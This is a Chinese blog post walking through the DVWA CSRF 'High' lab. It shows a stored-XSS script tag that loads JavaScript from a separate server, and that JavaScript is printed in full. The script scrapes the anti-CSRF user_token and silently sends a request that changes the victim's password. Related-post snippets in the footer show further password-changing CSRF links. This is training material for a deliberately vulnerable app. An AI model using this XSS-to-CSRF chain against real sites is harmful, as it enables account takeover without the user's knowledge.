DVWA—CSRF-High跨站请求伪造高级

已于 2023-03-17 11:18:40 修改
阅读量425 收藏 5
点赞数
文章标签: csrf 安全 前端
于 2023-02-09 23:31:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39330735/article/details/128959828
版权

1、这一关需要猥琐一点,我们先提交一个正常的数据包。查看这里提交了一个user_token。

而这个user_token我们可以从F12代码中看到,是登录进来之后就生成了

2、这里我们可以切换到从low的关卡中,在XSS(stored)关卡中埋下一个伏笔。——一个脚本连接

<script src=http://192.168.xx.xx/CSRF-high-take_token.js></script>

#这个CSRF-high-take_token.js脚本是写在另外一台服务器上的一个Js文件。

3、在这个脚本中将用来获取user_token的同时提交修改密码的get请求。CSRF-high-take_token.js代码如下

/*  取出token来实现csrf   */
var tokenUrl = 'http://192.168.100.4/vulnerabilities/csrf/';
var count = 0;
// 实例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
// 当请求的状态发生变化时,触发执行代码
xmlhttp.onreadystatechange = function() {
    //状态码:0:请求未初始化,1: 服务器连接已建立,2:请求已接收,3:请求处理中,4: 请求已完成,且响应已就绪
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200){
      // 取得请求的响应,并从响应中通过正则提取Token
      var text = xmlhttp.responseText;
      var regex = /user_token\' value\=\'(.*?)\' \/>/;
      var match = text .match(regex);
      // alert(match[1]);
      var token = match[1];
      // 发送修改密码的语法
      var changeUrl = 'http://192.168.100.4/vulnerabilities/csrf/?user_token='+token+'&password_new=12581&password_conf=12581&Change=Change';
      if (count == 0) {
        count = 1;  // 只发送一次,否则会多次发送
      xmlhttp.open("GET",changeUrl,false); // false 代表同步方式发送(前面的数据处理完才能进行)
        xmlhttp.send();
      }
    } 
};
xmlhttp.open("GET",tokenUrl, false);
xmlhttp.send();

4、当我们的payload在XSS(Stroed)-low关卡中注入完毕之后,并没有什么效果。要回去把关卡设置成high。

这个时候,当你点击到 XSS(Stroed) 界面的时候,用户界面没有任何反应,但是密码就已经被神不知鬼不觉的修改了!

W金刚葫芦娃W
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA1.10_CSRF
whime
07-11 321
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签中.
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 4941
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域中可用的全部变量。GLOBALS :引用全局作用域中可用的全部变量。GLOBALS:引用全局作用域中可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
DVWACSRF高级
m0_73896875的博客
07-11 258
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码中可以看到生成的Token。在high级别中,屏蔽了标签,所以无法直接利用。
DVWACSRF高级_dvwa csrf 高级,2024年最新原生网络安全开发的路该怎么走
最新发布
weixin_58132019的博客
04-17 835
/false代表同步方式发送。//状态码0:请求未初始化,1:服务器连接已建立,2请求已接收,3请求处理中,4请求已完成,且相应已就绪。count = 1;//只发送一次,否则会多次发送。//取得请求的响应,并从响应中通过正则提取Token。//实例化XMLHttpRequest,用于发送AJAX请求。//当请求状态发生变化时,触发执行代码。//发送修改密码的语法。
代码审计—DVWACSRFhigh
王嘟嘟的博客
10-31 953
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 1.黑盒测试 发现这里带了Token。 说实话我不会利用,哈哈。直接白盒看看吧。 白盒 通过和这个来判断Token,但是这里网上都说可以通过xss来获取session来进行判断。然后进行伪造等等,但...
DVWACSRF详解
qq_43665434的博客
03-03 1196
DVWACSRF 一、low级别 1、测试流程 如图,输入一次新密码和一次确认新密码就可更改密码,并没有索要旧密码进行验证。 用burp抓包看一下: 发现是get请求,而且并没有token,所以明显存在CSRF漏洞。 伪造一个请求链接: http://222.24.28.118/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 将password_new和passw
DVWA-master.zip
01-04
DVWA-master.zip
跨站攻击(XSS+CSRF).docx
01-05
跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。...
DVWA-master.7z 压缩包
09-14
下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下
docker-dvwa:DVWA的Docker Compose设置
03-06
:high_voltage: 开始 make start :prohibited: 停止 make stop :laptop: 用法 网址: 用户: admin password : password 您还可以通过以下方法在Web服务器容器上获取​​外壳程序: make enter :wrench: ...
DVWA 之 Cross Site Request Forgery (CSRF)
baynk的博客
10-29 2226
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ CSRF...
新手指南:DVWA-1.9全级别教程之CSRF
weixin_50464560的博客
03-19 494
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,并且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分...
CSRF跨站请求伪造
Gjqhs的博客
03-02 708
CSRF跨站请求伪造 原理总结 一个CSRF漏洞攻击的实现,其需要由“三个部分”来构成 1、有一个漏洞存在(无需验证、任意修改后台数据、新增请求); 2、伪装数据操作请求的恶意链接或者页面; 3、诱使用户主动访问或登录恶意链接,触发非法操作: 第一部分 漏洞的存在 关键字:跨站请求漏洞(CSR:CrossSiteRequest) 如果需要CSRF攻击能够成功,首先就需要目标站点或系统存在一个可以进行数据修改或者新增操作,且此操作被提交后台后的过程中,其未提供任何身份识别或校验的参数。后台只要收到..
DVWA--CSRF(初中高)
firecjh的博客
06-09 727
构造的攻击页面命名成含受害者主机ip的名字。这样referer就能包含了主机名。只要referer中有这个ip,就能绕过。给出自己的截图过程。3)利用存储型XSS-高级,获取token。2)使用bp抓包,修改referer。4)替换token,修改密码成功。分析中级做了什么过滤。中级使用第二种方法,让。在攻击机创建恶意网页。
DVWA-13-XSS(Stored)
dahe
03-07 248
目录 1.概念 2.实验 2.1 LOW 2.2 Medium 2.3 High 1.概念 存储型XSS又称持久型XSS,攻击脚本将被永久性地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。 攻击方式:这种攻击多见于留言版,攻击者在流言的过程中,将恶意脚本连同正常的信息一起注入帖子的内容中。内容被服务器存储下来,恶意脚本也永久地被存放在服务器的数据库中。当其他用户浏览这个被注入了恶意脚本的内容时,恶意脚本会在他们的浏览器中得到执行。 例如,恶意攻击者在留言板中加入以下代码 <s
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 1万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
CSRF
阳光梦的专栏
06-04 1248
预防CSRF攻击 什么是CSRF CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 那么CSRF到底能够干嘛呢?你可以这样简单的理解:攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学的诡计,例如通过QQ等
新手指南:DVWA全级别教程之CSRF
g695144224的博客
08-09 2761
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
【渗透测试】【DVWACSRF
preserphy的博客
08-07 1550
CSRF】 全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。...
dvwa跨站请求伪造 (csrf)
09-13
跨站请求伪造CSRF)是一种攻击方式,利用用户已经通过身份验证的会话执行非预期的操作。 在DVWA中,CSRF可以被用作一种漏洞进行攻击。攻击者可以通过在受害者浏览器中注入恶意代码或链接,来诱使用户执行某些不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值